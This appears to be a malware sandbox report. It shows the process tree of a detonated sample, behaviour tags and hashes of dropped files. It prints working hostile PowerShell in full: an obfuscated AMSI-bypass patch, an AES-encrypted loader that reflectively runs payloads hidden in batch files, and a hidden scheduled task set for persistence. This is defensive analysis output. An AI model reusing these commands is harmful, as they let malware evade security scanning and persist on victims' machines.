C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IQnBJngVXuve{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MWexOMsUJQhJQH,[Parameter(Position=1)][Type]$kGMcSUsYyd)$FUMFxZgVlYe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+'d'+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+''+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$FUMFxZgVlYe.DefineConstructor(''+'R'+'T'+'S'+'pe'+'c'+''+[Char](105)+'al'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+'eB'+'y'+'Sig'+','+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MWexOMsUJQhJQH).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$FUMFxZgVlYe.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'','Pu'+'b'+''+'l'+''+[Char](105)+'c,'+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+'i'+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+[Char](116)+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+'l'+'',$kGMcSUsYyd,$MWexOMsUJQhJQH).SetImplementationFlags('R'+'u'+''+'n'+'t'+'i'+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $FUMFxZgVlYe.CreateType();}$NXxqANQWkcSxm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+'m.'+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+'.'+[Char](85)+'n'+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+'o'+'d'+''+[Char](115)+'');$MhomcZXPVKlsiy=$NXxqANQWkcSxm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+'o'+'c'+''+[Char](65)+''+'d'+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'S'+'t'+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UFZJxulEYZENxXfttxL=IQnBJngVXuve @([String])([IntPtr]);$QHsXpBpnFBopWwySdfmCGg=IQnBJngVXuve @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$irzkNnvWbFv=$NXxqANQWkcSxm.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'M'+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$lUEurkpzxNClKg=$MhomcZXPVKlsiy.Invoke($Null,@([Object]$irzkNnvWbFv,[Object]('L'+[Char](111)+''+'a'+''+'d'+''+'L'+'i'+[Char](98)+'r'+'a'+''+'r'+''+[Char](121)+'A')));$vtetbjmkfaNEtYXsr=$MhomcZXPVKlsiy.Invoke($Null,@([Object]$irzkNnvWbFv,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$oNxsAcY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lUEurkpzxNClKg,$UFZJxulEYZENxXfttxL).Invoke(''+[Char](97)+''+'m'+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$pbdJtzHZnXNOvrBiw=$MhomcZXPVKlsiy.Invoke($Null,@([Object]$oNxsAcY,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$JYrPqXMOmN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vtetbjmkfaNEtYXsr,$QHsXpBpnFBopWwySdfmCGg).Invoke($pbdJtzHZnXNOvrBiw,[uint32]8,4,[ref]$JYrPqXMOmN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pbdJtzHZnXNOvrBiw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vtetbjmkfaNEtYXsr,$QHsXpBpnFBopWwySdfmCGg).Invoke($pbdJtzHZnXNOvrBiw,[uint32]8,0x20,[ref]$JYrPqXMOmN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'ger')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2408 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1436
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2056
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2284
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2588
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2844
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2676
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3200
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_906_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_906.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3112 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_906.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_906.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2304
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_906.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_906.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
PID:2340 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2CV3xqcQdYVw.bat" "7⤵PID:3036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2760
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:4412
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:3800 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
PID:4652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3404
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3956
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3984
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1288
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:420
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3720
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4136
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1712
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2536
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3296
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58ba8fc1034d449222856ea8fa2531e28
SHA17570fe1788e57484c5138b6cead052fbc3366f3e
SHA2562e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA5127ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
Filesize
17KB
MD58de803822fb8b73d0ce98ab7180fbd98
SHA174e2c82c10d4bc817e8d4b1c19f9140780e54289
SHA256794e8456e0e6fada3eb06229ac4897a552f737c3894c95b4f94127053f92c7da
SHA5125dc5adb15ec5d5c68a82bdad71f8f43b59db6cfe836fd63df71bfe1ce7370c80000da1bcab3aec8e21996a0f826c519a2f6dc1b15005e06892875ef73d886bf5
-
Filesize
276B
MD5cd92efd5f121ef3670621fe9e824bfdf
SHA13c0cc0d99c499f0c4ece458383915aa354755417
SHA256a0739557ead4f32409463fc585498f60c5f9af98cc1440d60ba530ae124cd50f
SHA5123c85fc1d273624987765643c1fd5baf237a76f70d3c810b20ea41b983ec93a2ba5d1edb53d8c635f65ebddff2dfe4d7a2ad379017e289d711d0553b220138ad0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
224B
MD518ec54d9c81e0b046323d9761232d4eb
SHA194170104af5869ea159918a0455dd9833973c0df
SHA256beef4b290bd2cc66c5a8b46f3b5b09a655d5c710489089920a4bac1c7a74d0de
SHA51242f04174973eeb9eba1e7cb0578875b45f16b884df3923b7000edd92a29976758af56100fe9ec81fbc5a460a961e18e50ca4ac00a8dcc1dbde669581b6bd5b65
-
Filesize
513KB
MD5a84be587721ab2558489178539f283e6
SHA15a48f5c98f7366d13f371965c19c98a5754bd90b
SHA25632cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
SHA512c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
Filesize
115B
MD5a0bf48d4abaa1d177553b10bd0e30df2
SHA19e7d46922a7a63c0f93a7bbace3112851543a9d2
SHA2563be15ae4f1b693b4eecdd434b25863e8571df5afdafa4fd6755d3afa7eb5c2a9
SHA5128fcef0a7a6b6cef9896c8ddb0893cd6d8e83e36b87b405784ed75bb08bc9953a3831eaf5f7ede1602260c48367b027f78d7a0ed4576e4d0b1ae6116399eef225
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b